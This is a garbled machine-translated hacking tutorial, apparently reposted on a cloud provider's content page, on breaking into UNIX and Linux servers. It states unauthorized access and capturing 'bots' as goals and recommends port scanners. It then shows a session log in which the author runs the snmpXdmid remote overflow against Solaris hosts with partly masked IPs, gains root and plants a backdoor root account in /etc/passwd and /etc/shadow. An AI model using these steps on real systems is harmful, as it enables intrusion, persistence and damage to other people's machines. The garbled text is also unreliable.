Best tutorial on linux intrusion (1)

Source: Internet
Author: User
Tags snmp

I. Basic Knowledge

1: Common UNIX versions:

Sco unix, Sunos, Solaris, HP-UX, Digtal, Unix, IRIX, AIX, Linux, FreeBSD, javasbsd, A/UX, BSD, BSD-LITE, Goherent, Dynix, Hurd (GNN ), inTeractive, Mach, Minix, Mks Toolkit, NetNSD, OSF/I, System V Unix, Unicos, Unix ware...

2: a few simple introductions

Sunos & solaris SUN originally wanted to replace sunos with solaris. However, at the user's requirement, the policy of coexistence of the two has been maintained so far;

Freebsd is one of the successors of the famous BSD-UNIX. It is quite stable among many UNIX branches, and many ISPs use Freebsd;

Linux is a free and cheap UNIX product for PC users (its hardware platform is Intel series CPU). In fact, many network administrators actually use Linux.

3: UNIX operating system features

(1) multi-user and multi-task; (2) portability; (3) tree-line file system; (4) I/O redirection and pipeline technology; (5) rich utilities; (6) each user has an email.

4: Highlights

(1) high stability and reliability; (2) strong network functions; (3) good development; (4) Powerful database support functions; and (5) high scalability.

Ii. Purpose of intrusion

1: Learn UNIX, be familiar with internal operations, and complete configuration...

2: as a stepping stone or to capture more UNIX bots;

3: unauthorized access to something that is not available under normal requests;

4: attack or use this tool to damage other systems;

5: more ......

Iii. intrusion methods

1: Find the target

Tool: supperscan, streamer, LANguard Network protocol 2.0, or others, depending on your preferences

Supperscan: Scan port. Note that the host contains %, #, &.... These are UNIX;

LANguard... with simple settings, you can start to judge that the operating system functions of the other party are excellent and accurate in similar software;

Traffic: use advanced scanning, select telnet, PRC, POP3, FTP, and Finger.

The same is true for other methods...

(Note: Many administrators intentionally change the information displayed during telnet login to confuse intruders)

2: Start intrusion

(1) Overflow (all UNIX overflow needs to be compiled in a UNIX/Linux environment)

A: Remote Overflow

Overflow? Too many! Let's just talk about it: freebsd remote overflow, bind Remote Overflow, Sun Solaris 5.7/5.8 remote overflow, and redhat6.xrpc status remote overflow... let's take a look at them one by one. Here I will give two simple examples:

A1: considering a lot of friends use windows, so you can see my brother --- the blue knight masterpiece "freebsd overflow full text version" (Address: http://www.itser.com/ez/.bbs/topic.cgi? Forum = 7 & topic = 25 & show =), because this overflow program has been compiled and can be used directly in windows;

A2: Remote Overflow of Sun Solaris 5.7

Search... finally let me find a sunos 5.7 and a sunos 5.8

Telnet 66. *. 146.48 -----> This is mine!

Sunoperating 5.8

Login: ply

Password:

Last login: Tue Apr 23 03:55:09 from 39448. ddn. xaonli

Sun Microsystems Inc. SunOS 5.8 Generic February 2000

$ Tmp/. sh -----> handle overflow at that time!

# Ls

Bin data etc initrd mnt proc sbin usr

Boot dev home lib misc opt root tmp var

Xfn skip

# Cat> snmp. c

... -----> Too long, omitted... find it by yourself!

# Gcc-o snmp. c -----> compile with gcc

Snmp. c: In function 'main ':

Snmp. c: 181: warning: passing arg 3 of pointer to function from incompatible pointer type

Snmp. c: 181: warning: passing arg 4 of pointer to function from incompatible pointer type

Snmp. c: 181: warning: passing arg 5 of pointer to function from incompatible pointer type

# Ls

Bin data etc initrd mnt proc sbin snmp usr

Boot dev home lib misc opt root snmp. c tmp var

#./Snmp

Copyright last stage of delirium mar 2001 poland // lsd-pl.net/

SnmpXdmid for solaris 2.7 2.8

Usage:./s address [-p port]-v 7 | 8

#./Snmp 216. *. 45.63-v 7 ----> Start overflow !!

DELIRIUM mar 2001 poland // lsd-pl.net/

SnmpXdmid for solaris 2.7 2.8

Adr = 0x000c8f68 timeout = 30 port = 928 connected!

Sent!

SunOS app1-stg-bk-sh 5.7 Generic_106541-09 sun4u iSCSI SUNW, Ultra-80

Id

Uid = 0 (root) gid = 0 (root) -----> is root!

Echo "ply: 0: 0: // bin/bash">/etc/passwd -----> Add a user first!

Echo "ply ::::::::::" >>>/etc/shadow

... -----> Continue if you want to do anything else!


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.